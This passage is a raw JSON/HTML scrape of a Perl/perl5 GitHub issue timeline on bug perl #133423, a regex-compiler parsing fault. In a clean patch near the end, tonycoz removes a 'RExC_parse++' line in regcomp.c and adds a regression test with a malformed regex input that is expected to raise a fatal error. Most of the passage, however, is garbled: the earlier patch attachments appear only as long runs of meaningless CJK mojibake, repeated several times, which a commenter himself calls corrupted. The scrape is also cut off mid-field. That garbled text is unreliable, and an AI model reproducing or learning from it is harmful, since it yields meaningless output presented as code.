class=\"notranslate\"\u003e䙲潭⁤昲㠵㡥愲㡥戲挷攰ち㑢搶愵敤㤵攴㜸㉦㠸㌳㌠䵯渠卥瀠ㄷ‰〺〰㨰〠㈰〱੆牯洺⁋慲氠坩汬楡浳潮‼歨着捰慮⹯牧㸊䑡瑥㨠䵯測′㐠卥瀠㈰ㄸ‱ㄺ㔴㨴ㄠⴰ㘰《卵扪散琺⁛偁呃䠠㈴㈯㈴㉝⁐䅔䍈㨠孰敲氠⌱㌳㐲㍝⁦潲‵⸲㘠浡楮琊ਭⴭਠ牥杣潭瀮挠†††簠ㄠⴊ⁴⽲支牥束浥獧⹴⁼‴‫⬫⬊′⁦楬敳⁣桡湧敤Ⱐ㐠楮獥牴楯湳⠫⤬‱⁤敬整楯渨⴩ਊ摩晦‭ⵧ楴⁡⽲敧捯浰⹣⁢⽲敧捯浰⹣੩湤數⁣愴㝤户㔷㌮⸴㌱〰㙥㠵㔠㄰〶㐴ਭⴭ⁡⽲敧捯浰⹣ਫ⬫⁢⽲敧捯浰⹣ੀ䀠ⴱ㔱〹ⰷ‫ㄵ㄰㤬㘠䁀⁲敤潟捵牣桡爺ਠ††††††††††剅硃彰慲獥⬫㬊††††††††††⁡獳敲琨啃䡁剁吨剅硃彰慲獥⤠㴽‧⤧⤻ਠਭ††††††††††剅硃彰慲獥⬫㬊††††††††††⁒䕸䍟晬慧猠㴠獡癥彦污杳㬊††††††††††⁧潴漠桡湤汥彯灥牡湤㬊††††††††⁽੤楦映ⴭ杩琠愯琯牥⽲敧彭敳朮琠戯琯牥⽲敧彭敳朮琊楮摥砠㌹捦捦㝤昱⸮搲㙡㝣慦㌷‱〰㘴㐊ⴭⴠ愯琯牥⽲敧彭敳朮琊⬫⬠戯琯牥⽲敧彭敳朮琊䁀‭㄰㘬㘠⬱〶ⰸ⁀䀠浹․桩杨彭楸敤彤楧楴‽\u2028❁✠汴‧〧⤠㼠✰✠㨠❁✻ਠ浹․捯汯湟桥砠㴠獰物湴映∥〲堢Ⱐ潲搨∺∩㬊礠⑴慢彨數‽⁳灲楮瑦•┰㉘∬牤⠢屴∩㬊 
⭭礠③畧ㄳ㌴㈳‽•⠿嬨㽞㨨㽛屜屸〰崩⥜屝屸〰簲孞幝屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰崩刮屜㘷〢㬊⬊‣⌊‣⌠䭥礭癡汵攠灡楲猠潦⁣潤支敲牯爠潦⁣潤攠瑨慴⁳桯畬搠桡癥⁦慴慬⁥牲潲献ਠ⌣ੀ䀠ⴲ㤰ⰶ‫㈹㈬㠠䁀礠䁤敡瑨‽ਠ‧⼨㽸浳楸瀩慢振✠㴾•∬ਠ‧⼨㽸硸砺慢挩⼧‽㸠∢Ⰺ†✯⠿㰽⼧‽㸠❓敱略湣攠⠿⸮⸠湯琠瑥牭楮慴敤⁻⍽⼨㼼㵻⍽⼧Ⱐ†††††††††††‣⁛灥牬‣ㄲ㠱㜰崊⬠∯③畧ㄳ㌴㈳⼢‽㸠≏灥牡湤⁷楴栠湯⁰牥捥摩湧灥牡瑯爠笣素洯⠿嬨㽞㨨㽛屜]⤩屜笣絝|㉛幞嵜砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸そ⥒⹜尶㜰⼢Ⰺ⬊ \u2029㬊 ⴭ ㈮ㄷ⸱ਊ\u003c/pre\u003e\u003c/div\u003e\n\u003c/details\u003e","bodyVersion":"950ec8a0347d5434f3946c99d464b841669859c34233c99e693596d84b5e22f9","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097454","createdAt":"2018-09-24T18:01:56Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"
nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZgy-siAAqTU0NDA5NzQ1NA=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097455,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1NQ==","body":"### From @khwilliamson\n\n\u003cdetails\u003e\u003csummary\u003e0003-PATCH-perl-133423-for-maint-5.28.patch\u003c/summary\u003e\n\n```diff\n牆浯〠㠴㔹愸㕡㌴㤷づ〲㌹㘲昸㔸戱㔵㍢敤戳㜴昵⁥潍敓⁰㜱〠㨰〰〺‰〲㄰䘊潲㩭䬠牡楗汬慩獭湯㰠桫䁷灣湡漮杲ਾ慄整›潍Ɱ㈠‴敓⁰〲㠱ㄠ㨱㔵㔺‵〭〶ਰ畓橢捥㩴嬠䅐䍔⁈⼳崳倠呁䡃›灛牥ㄣ㌳㈴崳映牯洠楡瑮㔠㈮ਸⴊⴭ 敲捧浯⹰⁣†††⁼‱ਭ琠爯⽥敲彧敭杳琮簠㌠⬠⬫ ′楦敬⁳档湡敧Ɽ㌠椠獮牥楴湯⡳⤫‬‱敤敬楴湯⴨਩搊晩⁦ⴭ楧⁴⽡敲捧浯⹰⁣⽢敲捧浯⹰੣湩敤⁸㙦㐹晦昷戸⸮ㅥ慤㔱㝡挷ㄠ〰㐶਴ⴭ‭⽡敲捧浯⹰੣⬫‫⽢敲捧浯⹰੣䁀ⴠ㔱㤵ⰱ‷ㄫ㔵ㄹ㘬䀠⁀敲潤损牵档牡਺††††††††††椠⁦唨䡃剁呁刨硅彃慰獲⥥℠‽⤧⤧ ††††††††††††䙶䥁⡌䔢灸捥楴杮挠潬敳瀠牡湥映牯眠慲灰牥映牯渠獥整⁤硥整摮摥挠慨捲慬獳⤢਻ਠ‭†††††††††删硅彃慰獲⭥㬫 ††††††††††䕒䍸晟慬獧㴠猠癡彥汦条㭳 ††††††††††潧潴栠湡汤彥灯牥湡㭤 ††††††††੽楤晦ⴠ札瑩愠琯爯⽥敲彧敭杳琮戠琯爯⽥敲彧敭杳琮椊摮硥㔠扦昱愱㘴⹣㈮㠸戰㑥攵⁢〱㘰㐴ⴊⴭ愠琯爯⽥敲彧敭杳琮⬊⬫戠琯爯⽥敲彧敭杳琮䀊⁀ㄭ㈲㘬⬠㈱ⰲ‸䁀洠⁹琤扡桟硥㴠猠牰湩晴∠〥堲Ⱒ漠摲∨瑜⤢਻⌠ ‣桔⁥楦獲⁴敳⁴牡⁥桴獯⁥桴瑡猠潨汵⁤敢映瑡污攠牲牯⹳ ⬊祭␠畢ㅧ㌳㈴″‽⠢嬿㼨㩞㼨屛屜へ崰⤩屜屝へ簰嬲幞屝㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸崰利尮㙜〷㬢⬊ 祭䀠敤瑡⁨਽⠠ ✠嬯㵛潦㵯嵝✯㴠‾倧协塉猠湹慴⁸㵛㴠⁝獩爠獥牥敶⁤潦⁲畦畴敲攠瑸湥楳湯⁳⍻⁽⽭孛昽潯崽⍻嵽✯ਬ䁀ⴠ〳ⰷ‶㌫㤰㜬䀠⁀祭䀠敤瑡⁨਽†⼧䅜⽻‧㸽✠湕獥慣数⁤敬瑦戠慲散椠敲敧⁸獩椠汬来污栠牥⁥⍻⁽⽭䅜筻紣✯ਬ†⼧㼨㴼✯㴠‾匧煥敵据⁥㼨⸮‮潮⁴整浲湩瑡摥笠紣洠⠯㰿笽紣✯‬†††††††††††⌠嬠数汲⌠㈱ㄸ〷੝†⼧灜登牥楴慣​慴絢✯㴠‾䌧湡❜⁴楦摮唠楮潣敤瀠潲数瑲⁹敤楦楮楴湯∠敶瑲捩污ଠ琠扡•⍻⁽⽭屜筰敶瑲捩污ଠ琠扡筽紣✯‬‣灛牥ㄣ㈳㔰崵⬊∠␯畢ㅧ㌳㈴⼳•㸽∠灏牥湡⁤楷桴渠牰捥摥湩⁧灯牥瑡牯笠紣洠⠯嬿㼨㩞㼨屛\\⥝尩筜紣]㉼幛嵞硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸⥝⹒屜㜶⼰Ⱒ  㬩 ⴊ‭㈊ㄮ⸷਱\n```\n\u003c/details\u003e\n","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" 
data-hovercard-url=\"/users/khwilliamson/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/khwilliamson\"\u003e@khwilliamson\u003c/a\u003e\u003c/h3\u003e\n\u003cdetails\u003e\u003csummary\u003e0003-PATCH-perl-133423-for-maint-5.28.patch\u003c/summary\u003e\n\u003cdiv class=\"highlight highlight-source-diff notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"牆浯〠㠴㔹愸㕡㌴㤷づ〲㌹㘲昸㔸戱㔵㍢敤戳㜴昵⁥潍敓⁰㜱〠㨰〰〺‰〲㄰䘊潲㩭䬠牡楗汬慩獭湯㰠桫䁷灣湡漮杲ਾ慄整›潍Ɱ㈠‴敓⁰〲㠱ㄠ㨱㔵㔺‵〭〶ਰ畓橢捥㩴嬠䅐䍔⁈⼳崳倠呁䡃›灛牥ㄣ㌳㈴崳映牯洠楡瑮㔠㈮ਸⴊⴭ 敲捧浯⹰⁣†††⁼‱ਭ琠爯⽥敲彧敭杳琮簠㌠⬠⬫ ′楦敬⁳档湡敧Ɽ㌠椠獮牥楴湯⡳⤫‬‱敤敬楴湯⴨਩搊晩⁦ⴭ楧⁴⽡敲捧浯⹰⁣⽢敲捧浯⹰੣湩敤⁸㙦㐹晦昷戸⸮ㅥ慤㔱㝡挷ㄠ〰㐶਴ⴭ‭⽡敲捧浯⹰੣⬫‫⽢敲捧浯⹰੣䁀ⴠ㔱㤵ⰱ‷ㄫ㔵ㄹ㘬䀠⁀敲潤损牵档牡਺††††††††††椠⁦唨䡃剁呁刨硅彃慰獲⥥℠‽⤧⤧ ††††††††††††䙶䥁⡌䔢灸捥楴杮挠潬敳瀠牡湥映牯眠慲灰牥映牯渠獥整⁤硥整摮摥挠慨捲慬獳⤢਻ਠ‭†††††††††删硅彃慰獲⭥㬫 ††††††††††䕒䍸晟慬獧㴠猠癡彥汦条㭳 ††††††††††潧潴栠湡汤彥灯牥湡㭤 ††††††††੽楤晦ⴠ札瑩愠琯爯⽥敲彧敭杳琮戠琯爯⽥敲彧敭杳琮椊摮硥㔠扦昱愱㘴⹣㈮㠸戰㑥攵⁢〱㘰㐴ⴊⴭ愠琯爯⽥敲彧敭杳琮⬊⬫戠琯爯⽥敲彧敭杳琮䀊⁀ㄭ㈲㘬⬠㈱ⰲ‸䁀洠⁹琤扡桟硥㴠猠牰湩晴∠〥堲Ⱒ漠摲∨瑜⤢਻⌠ ‣桔⁥楦獲⁴敳⁴牡⁥桴獯⁥桴瑡猠潨汵⁤敢映瑡污攠牲牯⹳ ⬊祭␠畢ㅧ㌳㈴″‽⠢嬿㼨㩞㼨屛屜へ崰⤩屜屝へ簰嬲幞屝㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸崰利尮㙜〷㬢⬊ 祭䀠敤瑡⁨਽⠠ ✠嬯㵛潦㵯嵝✯㴠‾倧协塉猠湹慴⁸㵛㴠⁝獩爠獥牥敶⁤潦⁲畦畴敲攠瑸湥楳湯⁳⍻⁽⽭孛昽潯崽⍻嵽✯ਬ䁀ⴠ〳ⰷ‶㌫㤰㜬䀠⁀祭䀠敤瑡⁨਽†⼧䅜⽻‧㸽✠湕獥慣数⁤敬瑦戠慲散椠敲敧⁸獩椠汬来污栠牥⁥⍻⁽⽭䅜筻紣✯ਬ†⼧㼨㴼✯㴠‾匧煥敵据⁥㼨⸮‮潮⁴整浲湩瑡摥笠紣洠⠯㰿笽紣✯‬†††††††††††⌠嬠数汲⌠㈱ㄸ〷੝†⼧灜登牥楴慣​慴絢✯㴠‾䌧湡❜⁴楦摮唠楮潣敤瀠潲数瑲⁹敤楦楮楴湯∠敶瑲捩污ଠ琠扡•⍻⁽⽭屜筰敶瑲捩污ଠ琠扡筽紣✯‬‣灛牥ㄣ㈳㔰崵⬊∠␯畢ㅧ㌳㈴⼳•㸽∠灏牥湡⁤楷桴渠牰捥摥湩⁧灯牥瑡牯笠紣洠⠯嬿㼨㩞㼨屛\\⥝尩筜紣]㉼幛嵞硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸⥝⹒屜㜶⼰Ⱒ  㬩 ⴊ‭㈊ㄮ⸷਱\"\u003e\u003cpre class=\"notranslate\"\u003e牆浯〠㠴㔹愸㕡㌴㤷づ〲㌹㘲昸㔸戱㔵㍢敤戳㜴昵⁥潍敓⁰㜱〠㨰〰〺‰〲㄰䘊潲㩭䬠牡楗汬慩獭湯㰠桫䁷灣湡漮杲ਾ慄整›潍Ɱ㈠‴敓⁰〲㠱ㄠ㨱㔵㔺‵〭〶ਰ畓橢捥㩴嬠䅐䍔⁈⼳崳倠呁䡃›灛牥ㄣ㌳㈴崳映牯洠楡瑮㔠㈮ਸⴊⴭ 敲捧浯⹰⁣†††⁼‱ਭ琠爯⽥敲彧敭杳琮簠㌠⬠⬫ ′楦敬⁳档湡敧Ɽ㌠椠獮牥楴湯⡳⤫‬‱敤敬楴湯⴨਩搊晩⁦ⴭ楧⁴⽡敲捧浯⹰⁣⽢敲捧浯⹰੣湩敤⁸㙦㐹晦昷戸⸮ㅥ慤㔱㝡挷ㄠ〰㐶਴ⴭ‭⽡敲捧浯⹰੣⬫‫⽢敲捧浯⹰੣䁀ⴠ㔱㤵ⰱ‷ㄫ㔵ㄹ㘬䀠⁀敲潤损牵档牡਺††††††††††椠⁦唨䡃剁呁刨硅彃慰獲⥥℠‽⤧⤧ ††††††††††††䙶䥁⡌䔢灸捥楴杮挠潬敳瀠牡湥映牯眠慲灰牥映牯渠獥整⁤硥整摮摥挠慨捲慬獳⤢਻ਠ‭†††††††††删硅彃慰獲⭥㬫 ††††††††††䕒䍸晟慬獧㴠猠癡彥汦条㭳 ††††††††††潧潴栠湡汤彥灯牥湡㭤 ††††††††੽楤晦ⴠ札瑩愠琯爯⽥敲彧敭杳琮戠琯爯⽥敲彧敭杳琮椊摮硥㔠扦昱愱㘴⹣㈮㠸戰㑥攵⁢〱㘰㐴ⴊⴭ愠琯爯⽥敲彧敭杳琮⬊⬫戠琯爯⽥敲彧敭杳琮䀊⁀ㄭ㈲㘬⬠㈱ⰲ‸䁀洠⁹琤扡桟硥㴠猠牰湩晴∠〥堲Ⱒ漠摲∨瑜⤢਻⌠ ‣桔⁥楦獲⁴敳⁴牡⁥桴獯⁥桴瑡猠潨汵⁤敢映瑡污攠牲牯⹳ 
⬊祭␠畢ㅧ㌳㈴″‽⠢嬿㼨㩞㼨屛屜へ崰⤩屜屝へ簰嬲幞屝㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸崰利尮㙜〷㬢⬊ 祭䀠敤瑡⁨਽⠠ ✠嬯㵛潦㵯嵝✯㴠‾倧协塉猠湹慴⁸㵛㴠⁝獩爠獥牥敶⁤潦⁲畦畴敲攠瑸湥楳湯⁳⍻⁽⽭孛昽潯崽⍻嵽✯ਬ䁀ⴠ〳ⰷ‶㌫㤰㜬䀠⁀祭䀠敤瑡⁨਽†⼧䅜⽻‧㸽✠湕獥慣数⁤敬瑦戠慲散椠敲敧⁸獩椠汬来污栠牥⁥⍻⁽⽭䅜筻紣✯ਬ†⼧㼨㴼✯㴠‾匧煥敵据⁥㼨⸮‮潮⁴整浲湩瑡摥笠紣洠⠯㰿笽紣✯‬†††††††††††⌠嬠数汲⌠㈱ㄸ〷੝†⼧灜登牥楴慣​慴絢✯㴠‾䌧湡❜⁴楦摮唠楮潣敤瀠潲数瑲⁹敤楦楮楴湯∠敶瑲捩污ଠ琠扡•⍻⁽⽭屜筰敶瑲捩污ଠ琠扡筽紣✯‬‣灛牥ㄣ㈳㔰崵⬊∠␯畢ㅧ㌳㈴⼳•㸽∠灏牥湡⁤楷桴渠牰捥摥湩⁧灯牥瑡牯笠紣洠⠯嬿㼨㩞㼨屛\\⥝尩筜紣]㉼幛嵞硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸⥝⹒屜㜶⼰Ⱒ  㬩 ⴊ‭㈊ㄮ⸷਱\u003c/pre\u003e\u003c/div\u003e\n\u003c/details\u003e","bodyVersion":"549b8fcf62780847054ff7e56b637233cf1a41a4eb7039880016fa04576b4a3b","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097455","createdAt":"2018-09-24T18:01:56Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount"
:0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZgy-siAAqTU0NDA5NzQ1NQ=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097458,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1OA==","body":"### From @tonycoz\n\nOn Mon\\, 24 Sep 2018 11\u0026#8203;:01\u0026#8203;:56 \\-0700\\, public@\u0026#8203;khwilliamson\\.com wrote\u0026#8203;:\n\u003e On 09/19/2018 06\u0026#8203;:28 PM\\, Tony Cook via RT wrote\u0026#8203;:\n\u003e \u003e\n\u003e \u003e Could you please make patches against blead/maint\\-5\\.28/maint\\-5\\.26 for\n\u003e \u003e this?\n\u003e \n\u003e Attached\n\nThanks\\, though they seem to be corrupted in RT\\, trying again\\.\n\nTony","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/tonycoz/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/tonycoz\"\u003e@tonycoz\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eOn Mon, 24 Sep 2018 11​:01​:56 -0700, public@​khwilliamson.com wrote​:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eOn 09/19/2018 06​:28 PM, Tony Cook via RT wrote​:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eCould you please make patches against blead/maint-5.28/maint-5.26 
for\u003cbr\u003e\nthis?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eAttached\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eThanks, though they seem to be corrupted in RT, trying again.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eTony\u003c/p\u003e","bodyVersion":"a54365cf32c4268e64b07eee468af61ed63bf660e52ca4c0b29b5b58782d4f6f","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097458","createdAt":"2018-09-25T04:44:29Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"
Y3Vyc29yOnYyOpPPAAABZg8K98gAqTU0NDA5NzQ1OA=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097459,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1OQ==","body":"### From @tonycoz\n\n\u003cdetails\u003e\u003csummary\u003e0003-PATCH-perl-133423-for-maint-5.28.patch\u003c/summary\u003e\n\n```diff\nFrom 048958aa54379e02093268f851b55b3de3b475fe Mon Sep 17 00:00:00 2001\nFrom: Karl Williamson \u003ckhw@cpan.org\u003e\nDate: Mon, 24 Sep 2018 11:55:55 -0600\nSubject: [PATCH 3/3] PATCH: [perl #133423] for maint 5.28\n\n---\n regcomp.c | 1 -\n t/re/reg_mesg.t | 3 +++\n 2 files changed, 3 insertions(+), 1 deletion(-)\n\ndiff --git a/regcomp.c b/regcomp.c\nindex f694ff7f8b..e1da15a77c 100644\n--- a/regcomp.c\n+++ b/regcomp.c\n@@ -15591,7 +15591,6 @@ redo_curchar:\n if (UCHARAT(RExC_parse) != ')')\n vFAIL(\"Expecting close paren for wrapper for nested extended charclass\");\n \n- RExC_parse++;\n RExC_flags = save_flags;\n goto handle_operand;\n }\ndiff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t\nindex 5fb1f1a46c..2880be45eb 100644\n--- a/t/re/reg_mesg.t\n+++ b/t/re/reg_mesg.t\n@@ -122,6 +122,8 @@ my $tab_hex = sprintf \"%02X\", ord(\"\\t\");\n #\n # The first set are those that should be fatal errors.\n \n+my $bug133423 = \"(?[(?^:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670\";\n+\n my @death =\n (\n '/[[=foo=]]/' =\u003e 'POSIX syntax [= =] is reserved for future extensions {#} m/[[=foo=]{#}]/',\n@@ 
-307,6 +309,7 @@ my @death =\n '/\\A{/' =\u003e 'Unescaped left brace in regex is illegal here {#} m/\\A{{#}/',\n '/(?\u003c=/' =\u003e 'Sequence (?... not terminated {#} m/(?\u003c={#}/', # [perl #128170]\n '/\\p{vertical \u000B tab}/' =\u003e 'Can\\'t find Unicode property definition \"vertical \u000B tab\" {#} m/\\\\p{vertical \u000B tab}{#}/', # [perl #132055]\n+ \"/$bug133423/\" =\u003e \"Operand with no preceding operator {#} m/(?[(?^:(?[\\\\\u0000]))\\\\{#}]\u0000|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670/\",\n \n );\n \n-- \n2.17.1\n\n\n```\n\u003c/details\u003e\n","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/tonycoz/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" 